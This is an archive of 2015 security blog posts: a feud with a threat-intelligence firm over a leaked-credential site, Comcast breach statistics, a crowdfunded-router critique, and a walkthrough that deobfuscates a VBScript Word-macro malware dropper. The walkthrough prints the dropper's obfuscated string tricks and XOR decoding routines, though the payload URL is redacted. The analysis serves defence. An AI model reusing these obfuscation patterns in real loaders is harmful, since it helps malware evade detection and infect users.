Tuesday, 1 December 2015

Internet Identity, Threat Intelligence, and a need for cooperation

As I wrote a few weeks ago, a company called Internet Identity based out of Tacoma, WA decided to engage with me by requesting that information be taken down from Canary. I had considered the matter dropped after having written that entry, but it appears that I had hit a nerve with someone at their organization and received a rather patronizing e-mail earlier today:

Subject: Canary.pw - Credential Gathering and Public Distribution
Date: 2015-12-01 8:52
From: Chris Sills <chris.sills@mail.internetidentity.com>
To: Colin Keigher <colin@keigher.ca>

Hello Colin,

My name is Christopher Sills and I’m an Operations Manager over at IID
and I wanted to reach out to you and discuss the various ways your data
from Canary.pw could be abused.

I fully understand that you’re attempting to create some form of 0-day
search engine for compromised credentials and ideally you would want
major corporations signed up for your platform and attempting to recover
data leaked in dumps you present, however, even that doesn’t do much
to protect the innocent users compromised in your data.

Your service, Canary.pw, can be used as a storefront for distributing
stolen credentials. The only thing a criminal would have to do is submit
samples of their stolen credentials to you, wait for you to host them
and then point prospective buyers to you so they may verify.

Your service also contains many lists of e-mail addresses scraped from
various sources that have likely been used at one time or another as
spam lists. Canary.pw makes aggregating that data less costly and more
efficient in regards to volume of valid e-mail addresses likely still in
use and ready for more attacks.

Additionally, anyone can search for employees of major corporations who
have had accounts using their corporate e-mail address as the username
compromised. The information in your data could then be used to either
blackmail those people or obtain legitimate credentials to corporate
resources (It may be bad security practice, but not everyone uses a
unique password for each unique login).

We (IID) have noticed that leaked data pertaining to our clients is
available within your platform and we would like for you to abandon your
current model of public availability. We would feel significantly
different about your Canary service if you forced all users to have an
account in order to get data and had some form of vetting process to
ensure only Threat Intelligence Services or Professionals had access. We
believe what you’re doing is irresponsible and may cause more problems
than it solves.
If you really want to help the community at large I recommend you reach
out to the NCFTA to discuss their Internet Fraud Alert program
(https://www.ncfta.net/internet-fraud-alert.aspx) or the Canadian Cyber
Incident Response Centre (CCIRC
Both have a vetted clearinghouse for compromised credentials and will
distribute found credentials back to the involved parties. Something you
don’t seem to readily do at this time.

If you require any assistance with my recommendations please let me know
and I’ll see what I can do to help put you in contact with someone we

Thank you,

Shift Manager of Service Operations
IID _Security Central_

I don't care to respond to this unnecessary e-mail directly because it's going to work out as effectively as me yelling at my radio when a Tory comes on the air to speak their opinion about some socio-economic matter. Instead I am going to point out what is wrong in Chris' and Internet Identity's position on this matter.

Mr. Sills opens up by completely misunderstanding the purpose of Canary, incorrectly assuming that it's "zero-day" and that I built it with the intention of having corporations using the platform. First of all, I am not sure where "zero-day" comes into play but considering that many security firms like to latch on to such terms (including "APT"), it should come as no surprise that it gets dropped inappropriately. Second of all, Canary is intended to be multi-purpose in both being a research tool to correlate breaches and a tool to determine whether or not a person or organization has been compromised.

He then continues to try and place me in the same bed as the attackers, which is highly inappropriate and erroneous. For one thing, the data stored on the site is not readily indexable for search engines to digest as by design you cannot do something like N+1 to grab everything from Canary. Additionally, I do in fact keep track of searches (so no, you're not really anonymous when using it) and I would happen to notice if someone started to bombard the server with far too many requests. Really, the work required to fully scrape all of the data from Canary would be better spent on just replicating everything I did.

What Chris and IID are failing to understand is this: the barn doors have already been opened and their fix is closing them after the horses have long-since escaped. If the concern is that the data is now available for everyone to see and they're looking to protect their clients, the solution is to not police the information off of the Internet, but instead they need to tell their clients to change passwords and let them know of the risks going forward. Trying to get the Internet to forget things simply does not work.

If we're going to protect users on the Internet, we need to come up with more open systems to alert everyone to what is going on. It simply won't work to contact each user individually, so there needs to be a system in place that anyone can subscribe to. I'll elaborate on what I mean a bit later.

Infuriatingly, they seem to suggest that I should stop allowing anyone to access the data and go through some "vetting process" and to put all data behind a wall. I guess it's only fair that since I called out their seemingly shady business practices that it was acceptable for IID to talk me down further and tell me that I am to make changes on how I operate my service.

This suggestion that I build what is effectively a "walled garden" makes absolutely no sense because I am sourcing the data from services that require no such access to begin with. As I've already pointed out, any person can go on to the sites that I monitor and again start taking the data for themselves and do as they please. Is IID going after other services that publish data it doesn't like to see?

How should I go about vetting people on that note? Besides routinely removing accounts that make use of untrustworthy e-mail services or banning access for those who abuse Canary, I simply cannot determine who's a security or IT professional by asking for them to register. It's time-consuming and is going to do absolutely nothing in terms of preventing whatever problem IID is conjuring.

Of course when his company is charging money for access to the same data that I am providing, I guess it should come as no surprise that this the narrative that they wish to take considering that my model is a threat to theirs.

While I cannot speak for IID's prices, I've had other threat intelligence services request over $150,000 USD for a year's worth of services for what appeared to be just a glorified list of IP addresses being sent to us on a regular interval. Being that they cited Chase Bank as a client to me in the originate complaint, I can only imagine how much they're worth to them and how much they likely charge to their other customers. So when I or anyone else comes on the scene offering a service that effectively undercuts them, I guess I cannot say that I am surprised that I'd get this sort of reaction.

And it should be apparent that I am indeed a competitor. Here's an article from Reuters, published this past September where they announced their product "Rapid Insight" (now renamed "Dossier") that seems to do some pretty familiar things:
IID, the source for clear cyberthreat intelligence, today announced the launch of a new threat indicator research tool, Rapid Insight. IID's Rapid Insight allows threat analysts and other security professionals to simultaneously search a dozen or more sources in one place for contextual information about questionable domains, hostnames, URLs, IP addresses, email addresses and more -- providing faster and more accurate responses to cyberthreats.
Rapid Insight allows researchers to simply paste a suspicious threat indicator into the search field found in the Rapid Insight search section of ActiveTrust, IID's big data solution for Internet security. These search strings may be in the form of a domain, hostname, URL, IP address, email address, MD5, SHA1 or SHA256. Rapid Insight checks that information against intelligence found in over a dozen sources, including: Alexa, DNS Lookup, IP Geolocation, Google Custom Search, Google Safe Browsing, IID ActiveTrust, Passive DNS, Reverse DNS, Reverse WHOIS via DomainTools, Virus Total and WHOIS via DomainTools. More sources are scheduled to be added in the near future. 
And this is sort of the problem that companies like IID present to cyber security as a whole: they make their products grotesquely expensive for what is really just stuff they sniffed out on the Internet no differently than say myself, Troy Hunt, and others. Canary does all of these things that "Dossier" does and has an open API, but IID is threatened by it because it offers what they have for free.

One of the things I am interested in doing and have been talking about it in closed circles is forming a working group to deal with breaches and other related data. There are many of us out there who have an interest in approaching this from a sane point-of-view and also doing it in a manner where it doesn't require participants to pay an arm and a leg.

Data breach details should be available in a similar fashion to that like an RBL. Companies like Google and Facebook do keep track of the same data that I do, but for good reason only focus on their own users. Individuals, small businesses, and NGOs have very few options and forking out six-figure sums to companies is not going to work.

If you're interested in helping me form this idea, please let me know.

Sunday, 29 November 2015

Tassimo T-Disc Barcode Encoding

One of the things I happen to own is a Tassimo coffee machine. It's pretty good compared to a Keurig because it allows for the use of syrup and milk. I do have to admit that from an environmental standpoint, it's pretty awful however. I recommend that if you're using one that you look into recycling the pods, but in Canada it appears that TerraCycle has stated they're no longer accepting them for their programme.

A thing that I was curious about years back was the barcode system and how it worked. I was able to find this page that contained details, but it has since become removed from the Internet and is only available via the Internet Archive. Because I'd like to keep this information readily available for others to see and searchable, I've gone ahead and copied down the details written by the original author.

So going forward none of this is my own, original writing but has been mirrored here for future reference.


What sets the Tassimo apart from similar single-serve machines on the market is the encoding of the brewing parameters for beverages on the surface of the pod (T-DISC) using a barcode that has been encoded using the Interleave 2 of 5 symbology.

On this page, you will find information related to investigating the correlation between the barcodes on the T-DISCs and the operation parameters for the Tassimo.

Operation Parameters

There are five parameters that comprise a typical Tassimo beverage brewing cycle:

  1. Water Temperature
    • This parameter sets the temperature for the internal boiler prior to brewing.
  2. Cartridge Charge
    • This parameter controls how much/long for pre-soaking T-DISC contents prior to brewing.
  3. Beverage Volume
    • This parameter controls the amount of water dispensed for the beverage - depending on the type of beverage, material in the pod, etc. the actual dispensed volume will vary.
  4. Flow Rate
    • This parameter controls the flow of water through the T-DISC during brewing, measured as a percentage.
  5. Purge
    • This parameter controls the final phase of the brew cycle which is used to evacuate or flush the T-DISC. This may be short or long depending on the type of beverage.

Binary Coding

While not definitive, the Tassimo patent application suggests that the data encoded by the barcode can be broken down into 13 bits, which in turn directly control the operation parameters of the machine:

Water TempBitsDecimalParameter
10283C / 181F
11393C / 199F
Charge000fast charge w/ soak
011fast charge no soak
102slow charge w/ soak
113slow charge no soak
Purge000slow flow / short period
011slow flow / long period
102fast flow / short period
113fast flow / long period

Decoding Barcodes

Initially, the process for determining the symbology and thus encoding of the T-DISC programs was uncovered through a process of trial-and-error that began with using a hacked :CueCat barcode reader to scan the T-DISCs to determine the numbers behind them.

From this exercise, a list of six digit numbers was compiled and next used as input to a barcode generator to determine the symbology used for encoding.

By comparing generated barcodes with the corresponding T-DISC, it was discovered that Interleaved 2 of 5 symbology was being applied - a common standard.

Next, the codes were broken down into their binary equivalents to try and discern common patterns that may correspond to key parameters like volume of dispensed water.

Thursday, 26 November 2015

Comcast Breach by the Numbers

As was reported over the past few weeks, about 600,000 usernames and passwords for Comcast users were available for sale. I have come across the data since then and have decided to reveal some stats.

In the dump there were the following:
  • A CSV of e-mail addresses, customer names, and associated physical addresses (comcast_27k_emails_with_full_house_addresses.txt)
  • A CSV of usernames and passwords in plaintext (comcast_590K_users_with_plain_text_passwords.txt)
  • A SQL dump of a table containing account IDs, GUIDs, aforementioned usernames, account statuses, and passwords (comcast_vanity.sql)
Additionally, a text file containing the following:
hacked by orion, sold on Python Market 
software vuln allowed access to mail servers which contained user emails and plain text passwords lol, enjoy. Do not leak out this link or else i will....do fucking nothing. 
Update Monday November 9,2015: Comast is full of shit.txt
Total usercount (with passwords):  590,298
comcast claims to have reset all affected accounts..and yet many of them still work just fine, LOL!
yup this was totally from phishing, comcast boxes were totally never breached!

I haven't put these into Canary yet but I have gone through the data for those who wish to know how affected people were. I also believe that based on the contents that something belonging to Comcast (or a third-party) was indeed breached contrary to their official statement.

For the record, I did not purchase the data.

The Numbers

I tweeted this a few days ago, but here are the raw numbers:
  • 590,298 usernames/e-mail addresses and passwords were included in this breach
    • 413,964 unique passwords were found within the list
    • 296,907 of those passwords appear in rockyou.txt
  • 27,262 e-mail addresses, individuals' names, and physical addresses were exposed
  • 889,627 records were listed in the SQL dump

What's in the SQL dump?

Interestingly, the SQL table has the following columns:

  • account_id
  • guid
  • vanityName
  • enabled
  • suspended
  • migration_status
  • migrated
  • migration_password
When you see that Comcast is denying that they suffered a breach and then the attacker claiming that they breached a mail server, you have to wonder what the truth is here when you see a SQL database including details like account IDs, something about migration (to another system maybe?), and the status of the account. There's allegations that this data may have came from a third-party, so perhaps there is some truth in all of this for Comcast, but what was the actual source?

I was curious how many actual customers were affected by this breach so I did two things: I looked for how many accounts were marked as "enabled" and then how many were marked as "suspended", plus a few extra things to see what was going on. 

Here's how it all broke down:

  • Of the 889,627 accounts listed in the dump, 851,093 accounts were marked as "enabled"
    • Only 7 of those accounts were marked as "suspended"
  • 889,555 of all accounts have been marked as "migrated"
  • The passwords in the password file matches the number of entries in this database where the passwords were not marked as null (590,298)
The numbers here makes it quite clear that Comcast or a third-party with access to the data suffered a breach.

Where are people affected the most?

In the 27,262 customer addresses and e-mails exposed, 5,994 unique ZIP codes were represented--there are about 43,000 across the whole United States. These were the top-ten ZIP codes that had customers affected:
  1. 80202 - Denver, CO (58 customers)
  2. 55303 - Anoka, MN (57 customers)
  3. 15601 - Greensburg, PA (54 customers)
  4. 37214 - Nashville, TN (52 customers)
  5. 17331 - Hanover, PA (47 customers)
  6. 26003 - Wheeling, NV (45 customers)
  7. 15301 and 46350 - Washington, PA and La Porte, IN (44 customers)
  8. 19464 and 21014 - Pottstown, PA and Bel Air, MD (42 customers)
  9. 77702 - Beaumont, TX (40 customers)
  10. 02703 and 17701 - Attleboro, MA and Williamsport, PA (37 customers)

Of those 27,262 customers, 3,256 of them had their passwords exposed in the password list--assuming that their e-mail addresses' local-parts can be correlated to the "vanityName" field.

I have created a map that will let you see who's affected. There are some weird quirks due to problems with ZIP codes not matching up with their respective cities, so keep that in mind.


As stated already, Comcast or a third-party was breached and this data was exposed. Comcast owes an explanation to its customers.

I'll be placing the e-mail addresses on Canary as soon as possible. 

Friday, 20 November 2015

Internet Identity and actually being effective with threat intelligence

A few weeks ago, I wrote about my problem with threat intelligence. It's sort of the new hotness in the cyber security sector as instead of actually trying to fix problems, we have new companies emerging to tell you that they cannot help you more than scream that the sky is falling.

Last week, I received a curious e-mail from a company based outside of Seattle called "Internet Identity" or "IID": 
Subject: Requesting assistance: Fraud placed on canary.pw
Date: 2015-11-11 15:24
From: IID SIRT <alert@internetidentity.com>
To: support@canary.pw

Sir or Ma'am,

We are contacting you on behalf of our client Chase Bank to notify 
you that your website, canary.pw, has been compromised and a phishing 
page has been hidden in one or more of its directories.

I work with an Internet security company based in Washington State 
called Internet Identity, and am contracted by our client to assist 
in mitigating the attacks targeting their customers.

The files in question can be found at the following location:

canary [.] pw/view/?item=c1aa76c1226a80bdf050e0d7d14f1ff7

Should you have any questions or concerns, please call our 24/7 
Security Team at the phone number listed below. Simply reference 
the case number and any one of my colleagues will be able to help.

Thank you very much for your time.

Best regards,

Security Incident Response Team
I responded to them with a short, one-sentence e-mail asking if they had bothered to read the "About" page on the website. Clearly the e-mail sent to me indicated that they were under the impression that I was somehow breached myself. They then went to send a clarification e-mail:
Subject: Stolen Credentials
Date: 2015-11-11 15:51
From: IID SIRT <alert@internetidentity.com>
To: support@canary.pw


We are working on behalf of Chase Bank in order to remove the stolen 
credentials at the following URL:



The credentials posted here have been fraudulently acquired and need 
to be removed as soon as possible.

Please take action to suspend this account or remove the offending 

Please let us know if you need any further information.  We greatly 
appreciate your prompt attention to this issue and request that you 
advise us regarding what actions you take.


Security Incident Response Team
To which I replied:
Subject: Re: Stolen Credentials
Date: 2015-11-11 15:57
From: Colin Keigher <colin@keigher.ca>
To: IID SIRT <alert@internetidentity.com>


You are contacting another threat intelligence service. Please read the 
"About" page (https://canary.pw/about/):

> Canary is an open-sourced project created for members of the security 
> community to share and distribute information relating to data loss. Data 
> is sourced from a variety of sources through community members. The goal 
> is to allow for researchers and organisations to better understand and 
> react to data loss.
> What is collected for this website are documents from various 
> document-sharing websites, Internet forums, and social media that may or may 
> not contain data that is not intended for the general public but otherwise 
> has. The intention is to allow individuals, organisations, and researchers to 
> be able to identify where exposed data is being posted and what history it 
> may or may not have with other leaks. The idea is to ensure data integrity 
> and to dispel any ambiguity about information that is out there.

Please contact the affected individuals in the dump that was posted to change 
their passwords as that is what makes most sense--do you not agree?

This information was retrieved from Pastebin in September 2015 and was not 
"frauduently acquired" by us. We monitor several websites for information that 
has been posted.

And then left it at that. There was no response or anything from them. The solution for this company's client was simple: change the password. The cat is already out of the bag, right? How are you going to put that genie back in the bottle?

But nope. It appears that either IID is either run by completely inept individuals who don't get the concept of addressing actual threats or they're attempting to make themselves look like they're worth the amount of money they charge to their clients by going and harassing my hosting provider, telling them I am hosting "fraudulently acquired" material. They're not really addressing any sort of "threat" here by trying to scrub the Internet of anything: have they not heard of the "Streisand effect"?

Yes. The data was probably "fraudulently acquired" as someone probably breached some bankers' association website and then dumped the contents on Pastebin for all to see. My software picked up on it, put it up on Canary, and now it's there so we can track future breaches. For a company like IID, the concept of what I am doing should be pretty basic if they're going to make claims like this on their website:
Our Threat Intelligence team continuously validates and processes incoming data, adding classifications and attributes for context, and then pursuing organic intelligence that adds further value to the data. In collaboration with security researchers and experts around the world, our team can turn a whirlwind of incidental blips into a coherent, actionable assessment.

Whenever our investigators find a suspicious event, file or situation, they quickly validate and verify the symptom, identify and analyze malware and malicious campaigns, and conduct background reputation checks on any associated IP, domain and URL. The team can monitor Denial of Service attacks and provide intelligence to affected customer targets, or perform network forensics to identify compromised hosts throughout an organization using DNS log data.
Or maybe how they explain their acquisition of threat intelligence data through their service:
Security analysis depends on compiled and correlated emerging threat data to stay ahead, but investigating threat indicators has been a tedious manual process.

Dossier provides contextual information about a potential threat so you can make informed decisions about defensive actions. And it’s so fast and effective, you end up with lots more time to do your job.
So here's a question for IID: was it your organization that decided that a password posted on the Internet for everyone to see should be removed from wherever you find it to justify how much you charge your clients or was it your client that made the "informed decision" to then tell you to act as Internet police? Based on your Glassdoor reviews, I can safely assume the answer here.

Here's a pro-tip from someone who enjoys working with breach data and actually can provide "informed decisions" you can make based on them: think that the password has been exposed to the Internet for all to see? Change it and don't get upset at seeing it posted elsewhere; instead get pissed off at whoever lead to having your data exposed in the first place.

IID demonstrates the problem with threat intelligence: justifying charging your clients for your services. What good is a threat intelligence service like this company if all they're going to do is let you keep your passwords as is and then just go and police the data off of the Internet; it doesn't work that way and any service provider that tells you that they can scrub all instances of any specific data is outright lying.

For the hell of it, I decided to do something with the original data that they complained about.

In the sample, there were 6,147 accounts listed off. Of those accounts, none of the passwords repeated so we're off to a good start. How many of the passwords have existed in previous dumps? Well, if we use our good friend 'rockyou.txt', which contains about 14.3 million unique passwords from a database dump from half-a-decade back, we can determine that 1,484 passwords (24%) had appeared in previous dumps.

Of those 6,147 accounts, 52 of them belonged to IID's client, Chase Bank--or about 1% of the total. If I take the list of the Chase users and compare them to the passwords from the password list that were found in the dump, 24 of them had matches, meaning that almost half (46%) of their affected client's users have used passwords that have been found elsewhere.

This means that IID has completely idiotic policies for handling database breaches, leading them to be more of a threat to their clients than the data that is leaked themselves. They have no clue about breaches and are dealing with matters in a way that cannot scale at all.

As a result of the idiocy displayed by IID, I've gone about doing two things.

Firstly, the data has been reposted to Canary in a redacted form, where the passwords have been replaced with their MD5 equivalents and a notice has been placed at the top of the sample indicating what has happened (this is policy going forward). If they take issue with the e-mails being posted here, then IID is being outright malicious and is in my opinion looking to take out a potential competitor that does their work for free. IID is more than welcome to prove my opinion wrong here however.

Secondly, I am in the midst of migrating my host off of the hosting provider and am placing it elsewhere. I don't have time to waste dealing with inept companies that don't understand the data that they're working with. IID had spent time on my website reading the contents and yet still opted to go down this avenue.

IID is no longer welcomed to use Canary going forward. Should the company take exception to this, they're more than welcome to contact me.

Wednesday, 21 October 2015

Deobfuscating malware droppers written in VBScript

Once in a while I run across malware that drops itself via a macro embedded into a Microsoft Word DocX file, written in Visual Basic script. These payloads are fairly common and have been documented in a number of places. However, I noticed in one instance that the payload it was retrieving was encoded somehow with the macro doing the decoding.

If you're not sure what the document I am referring to looks like, here's a screenshot of what you should expect if you were to open it in Word or LibreOffice.

I've opted to not share the whole source code for the payload here but I am writing this as a primer for retrieving the data should you be interested in it. I've removed references to the keys and location of the payload but again this writeup should provide more than enough information.

It's pretty straightforward to decipher what the URL is so you can download the payload. It will look a lot like this when you do so:
IsDwQV = "httEeDxPbOZhstcWp://"
dlBSaKVPUZeUffK = Replace(IsDwQV, "EeDxPbOZhstcW", "")

vJPIYmKkzEidc = dlBSaKVPUZeUffK + "" + "file.da" + "t"
As we can see, the URL is really "" so all one has to do is retrieve it normally and have the payload. This isn't new to this type of attack, but what is different here is that you'll need to look for an additional line to decode the file. An example of what we're looking for is here:
PTIEIYzefrUBrv.Write auRPAIQxRBuNVNs(ZlOton(AsWLAJsjgp), "mal" + "wa" + "rek" + "ey")
Again, just as straightforward as earlier, we just need to combine the second argument in this function to form the key "malwarekey".

Now that we've gone and figured out the payload's URL and the key, we'll want to see how the payload is decoded. It goes through two processes: the first where reorders the contents of the file and the second where it performs a XOR on each byte.

The reordering function looks a lot like this (keep in mind, the variables and function names will change to avoid detection but the patterns will remain mostly the same):
Function auRPAIQxRBuNVNs(gZZoRIEiqkagc, CIKkGOaWM)
Dim vJPIYmKkzEidc
vJPIYmKkzEidc = ""
Dim yjiyoPGJqpm
yjiyoPGJqpm = 2 - 1
Dim RpKxIaBse
RpKxIaBse = 1
For RpKxIaBse = 1 To Len(gZZoRIEiqkagc)
PhnHyZVCyES = Mid(CIKkGOaWM, yjiyoPGJqpm, 1)
vJPIYmKkzEidc = vJPIYmKkzEidc & Chr(Asc(Mid(gZZoRIEiqkagc, RpKxIaBse, 1)) Xor Asc(PhnHyZVCyES))
yjiyoPGJqpm = yjiyoPGJqpm + 1
If Len(CIKkGOaWM) < yjiyoPGJqpm Then yjiyoPGJqpm = 1

End Function
The XOR function then will look like this:
Function ZlOton(ODkdfygTwl)
Dim XvZDYBA, ZazVWW, SyyWJefcxs, eauVLHixkVU, cQdAHb, WGHeGPbgR
Dim myjfHUNidfOgtQ
ZazVWW = (&H3EF + 2892 - &HF3A)
SyyWJefcxs = (&H3EF + 2892 - &HF3A)
myjfHUNidfOgtQ = LenB(ODkdfygTwl)
Do While XvZDYBA <= myjfHUNidfOgtQ
WGHeGPbgR = WGHeGPbgR & Chr(AscB(MidB(ODkdfygTwl, XvZDYBA, 1)))
SyyWJefcxs = SyyWJefcxs + 1
If SyyWJefcxs > 300 Then
cQdAHb = cQdAHb & WGHeGPbgR
WGHeGPbgR = ""
SyyWJefcxs = (&H3EF + 2892 - &HF3A)
ZazVWW = ZazVWW + 1
If ZazVWW > 40 * (&H20 + 1142 - &H491) Then
eauVLHixkVU = eauVLHixkVU & cQdAHb
cQdAHb = ""
ZazVWW = 1
End If
End If
ZlOton = eauVLHixkVU & cQdAHb & WGHeGPbgR
End Function
The reorder function is easy to clean up, so I've gone ahead and written it like so:
Function reorder(filedata)
Dim var1, var2, var3, var4, var5, var6
var1 = 1
var2 = 1
var3 = 1
Do While var1 <= LenB(filedata)
var6 = var6 & Chr(AscB(MidB(filedata, var1, 1)))
var1 = var1 + 1
var3 = var3 + 1
If var3 > 300 Then
var5 = var5 & var6
var6 = ""
var3 = 1
var2 = var2 + 1
If var2 > 200 Then
var4 = var4 & var5
var5 = ""
var2 = 1
End If
End If
reorder = var4 & var5 & var6
End Function
Once we've cleaned this all up we can now determine that the function does absolutely nothing and is there to really obfuscate it further. The data that goes through this function comes out as the same, so it's really just a time-waster. However, the data is still encoded so I did go ahead and clean up the second function as so:
Function decodexor(filedata, filekey)
Dim var1
var1 = ""
Dim var2
var2 = 2 - 1
Dim var3
var3 = 1
For var3 = 1 To Len(filedata)
var4 = Mid(filekey, var2, 1)
var1 = var1 & Chr(Asc(Mid(filedata, var3, 1)) Xor Asc(var4))
var2 = var2 + 1
If Len(filekey) < var2 Then var2 = 1

decodexor = var1
End Function
Okay. So this code does in fact do something and now tells us that it's a straightforward XOR of the data. We can now just rewrite this script into Python line to line.

I've made it available via this Github Gist and per below:
from sys import argv

filename = argv[1]
malwarekey = argv[2]

def dexor(filedata, filekey):
    var1 = ''
    var2 = 0
    var4 = ''
    for x in xrange(0, len(filedata)):
        var4 = filekey[var2]
        var1 = var1 + chr(ord(filedata[x]) ^ ord(var4))
        var2 += 1
        if var2 >= len(filekey):
            var2 = 0
    return var1

if __name__ == '__main__':
    data = open(filename, 'rb').read()
    print dexor(filedata=data, filekey=malwarekey)
You'll want to ignore the fact that this Python function is really a terrible mirror copy of the original, but works one-to-one like the original VBScript; there are of course better ways to write this.

Once happy, we can run it like so:
$ python dexor.py file.dat malwarekey > file.exe
$ file file.exe 
file.exe: PE32 executable (GUI) Intel 80386, for MS Windows
Now we have the file decoded and can execute it within whatever sandbox we'd like!

Wednesday, 7 October 2015

An open response to Veiltower and Edsard Ravelli's Kickstarter update

An update was posted on the Veiltower Kickstarter earlier today. This was in response to the furor expressed by myself and many others on Twitter since yesterday morning. As a result of this response and as a follow up to my previous entry, I've opted to opine on the response.
Dear Backers,
Edsard here, developer of Veiltower. Our project has now been active on Kickstarter for over 24 hours. To say that it has been overwhelming is a major understatement.
On the one hand we’ve been receiving a lot of praise - particularly from friends, colleagues and business partners who know us - and on the other hand there has been criticism directed at our project from a few people in the information security community. 
The criticism was primarily directed at one thing; the ‘100% secure’ statement on our Kickstarter page. Information security officers will always tell you that nothing can be infinitely 100% secure. And that is true. But frankly this is, in my honest opinion, a theoretical debate. For instance ‘PGP’-encrypting technology for e-mail is great, but 99% of people on the planet don’t use it. Why? 

This isn't amateur hour: the fact that you tried to enter the cyber security space with what appears to be inadequate knowledge and research should be enough to warrant scorn and ridicule over the use of the term "100% secure".

Trying to also pass off praise from friends, colleagues, and business partners in face of this valid criticism is akin to a child receiving praise from their parent after having achieved a failing grade in school. The opinion of the parent is not going to change the outcome of the child's inability to perform.

The reason why information security professionals who are adept at their jobs frown upon "100% secure" statements is that it is impossible to have such a thing. If your device was even remotely capable of providing this, you wouldn't be selling it at $159 but instead for much, much more. By using that statement, you've put yourself in a league of many other failures who've gone and made such a remark and then later found to be far from secure.

The problem with information security isn't a device or application problem: it's a human one. The human problem--or as I like to call it, the "Layer 8 Problem"--is the primary culprit behind breaches, malware infections, and scams. With infections and scams, users tend to fail to keep their machines up to date or do not take a critical look at what they're being presented with. You fail to understand this but have no problem going about stating that a simple VPN and "secure" access point is going to solve everything.

I am ignoring your PGP question because if you truly understood the problem you're facing you would have not asked that.
If you want to secure yourself as a tech-savvy person you would setup a solution in your home with a strong firewall, strong Wi-Fi encryption, and add into the mix a VPN both on your system at home as on all of your devices. You will configure and maintain them daily, spend the effort and remain vigilant at all the time. Simple. But most of you, and the majority of internet users, neither have the time or the experience to set this up, let alone maintain it. 
And that’s what the Veiltower concept is all about. It’s about combining existing and proven methods in a way that’s easy for ‘Average Joe’. The real threat to our security – as stands today – is the complexity of use and the lack of usability. We don’t use ‘PGP’ because it’s perceived as complex. 
The "real threat to our security" is not just the complexity of it or that humans make mistakes, it is also the fact that people like you try and sell half-baked solutions. I come across many, many products on a constant basis in my line of work where the vendors promise that it will do this with minimal cost on resources. For every one good security product out there, there are umpteen that are complete garbage and are backed by individuals like yourself. I rarely if ever endorse a product but I have no problem calling one "garbage" when I see it--and yours comes under that category.

When you go on Kickstarter claiming "100% secure" then go on Twitter and claim that you're just stating this for the common layperson, you're being deceitful and demeaning. It doesn't matter if you're talking to an information security professional or a common user: you tell the truth. Making security easier for users is something that all of us should try and do, but we do it in a way that doesn't require us to talk down to them--like you are--and also doesn't involve us manipulating them by making outright lies--such as claiming "100% secure".

Also, while I won't explain the problem with PGP in this response, I will explain the problem with your example. PGP is not something that you'd use to secure a network or computer but instead it's something to secure data. PGP won't stop malware, won't stop data leaks on networks, and won't prevent the human problem. This is a really an inadequate example on your part and I am not sure why you'd want to use this other than you have no clue which is really what I think is going on here.
And that is what I have focused on for the past 12 years; taking something very complex and making it easy to use. For example in 2001 at KPN (biggest Dutch carrier) I created a simple way to connect via ‘GPRS’ – because they understood that without usability nobody would use their service. I introduced automatic carrier detection and Wi-Fi (including automatic authentication to various hotspot providers) into the Vodafone Connection Manager worldwide in 2005 and 2006, although it seemed like it couldn’t be done because Wi-Fi was a ‘competing technology’ to their mobile data offering. In 2009 I created a solution for Best-Buy that would do both GSM and CDMA (2 competing technologies used by AT&T and Verizon) and switch a user from one network to the other, based on the best coverage for that user at that location - without the consumer having to do anything. 
Veil Systems is not based around a small group. It’s about a collection of idealistic people from the US, UK, Ukraine, Argentina, The Netherlands, Switzerland, Germany and Russia that came together – all bringing their own expertise – to create Veiltower. Our goal: help stop cyber-crime and protect the people that need protecting. 
Great. I am glad that you have this team and experience behind you: why are you just pointing out yourself, a designer, and a logistics person in the Kickstarter instead of you know maybe people who are behind the development of this project? You claim to have people scattered all over the Americas and Europe yet only focus on yourself and two people from the Detroit area. When you cite these countries, are they the actors in your videos or are they actually the main people behind the project?
We received comments about the lack of technical specs on our Kickstarter page. We did this deliberately. In our experience most of you don’t care about the various technical ‘flavours’ which could have been used. EAP-TLS vs. EAP-TTLS vs. EAP-FAST or 256-bit symmetric key vs. 2048-bit asymmetric key or Broadcom vs. Intel chipsets or why 256Mb is enough instead of 512Mb or Debian vs. OpenBSD vs. openSUSE. Every one of them have pro’s and con’s. That creates an infinite debate without end. In the end; it’s a ‘flavour’. You – the people we have built Veiltower for - just want it to work. You just want it to protect you. We knew, well in advance, that with adding a lot of tech specs we would scare you off or run the risk of our story would end up in a technical debate. And that is not what this should be about. 
You're essentially telling everyone that you'd rather create a blackbox rather than give any level of specifications on the product? This makes no sense considering even other Kickstarters like your own have referenced such things. Also, calling encryption symmetries as "flavours" is woefully ignorant and just demonstrates a lack of technical depth that you have.
Is Veiltower is finished product that has undergone every possible certification and validation process? No! It’s a prototype that we have developed, tested and that works. Can it be improved? Always! And that’s exactly why we are on Kickstarter. The funding will allow us, as part of our 6 month process, to do the types of improvements, certification and validation tests that the information security community – rightfully – demands from a finished product.  
Whoa. Stop the fuck right there.

So what you're telling us is that Veiltower has not gone under every possible certification and validation process, but you had the audacity to claim that it is "100% secure"? What sort of validation tests do you plan to take on this? What sort of certification? Can you elaborate on how you tested the device?
Note: If we don’t achieve our funding goal. Nobody pays anything. And if we achieve our funding goal and we don’t deliver we also refund your money. We have stated this on our Kickstarter page very clearly. 
This opens up a question for me: how are you going to continue to guarantee support for the product after raising all the money? The reason why I ask this is that in 2013, your prior company, Diginext claimed bankruptcy, leaving the organization owing almost half-a-million Euro.

If your product is as good as you claim it to be, you would not be going to Kickstarter for getting it launched because you'd have investors crawling all over you for what would be considered the Holy Grail of Cyber Security. Your business plan to use Kickstarter and your earlier bankruptcy does not seem to add up in my books as something that will work long-term for users.
Let’s do this!
Edsard Ravelli
Let's say we don't do this and instead end the Kickstarter. You're making yourself look like a fool and you're tarnishing the names of two other individuals who do not deserve to be part of your failure.

Tuesday, 6 October 2015

Veiltower: a misleading plastic jungle of deception

Once again we have another Kickstarter that claims that it is 100% secure, un-breachable, and uses unheard of cryptography. Introducing "VeilTower", a plastic jungle of deception.

As indicated in my opening, I've dealt with this sort of claim before where erroneous claims about the product's capabilities were made in a Kickstarter. In this case, we're being told of the following capabilities in the device using terms like "military-grade" which tend to set off alarms:
Some of the most security conscious organizations in the world have been using what’s called 802.1x with great success. That’s what we’re using. The encryption currently in use for typical consumers is 256 bit encryption. We’re utilizing 2048 bit encryption. We wanted to give consumers a product with military-grade technology.
Veiltower also makes your digital presence anonymous by masking your traffic and connected devices with it's state of the art embedded VPN (Virtual Private Network) solution.
It goes on further in an update that was posted after they were confronted online to explain its "100% secure" statement:
Some have questioned whether its not too bold of a statement to claim Veiltower provides 100% security. And that is a very fair question.
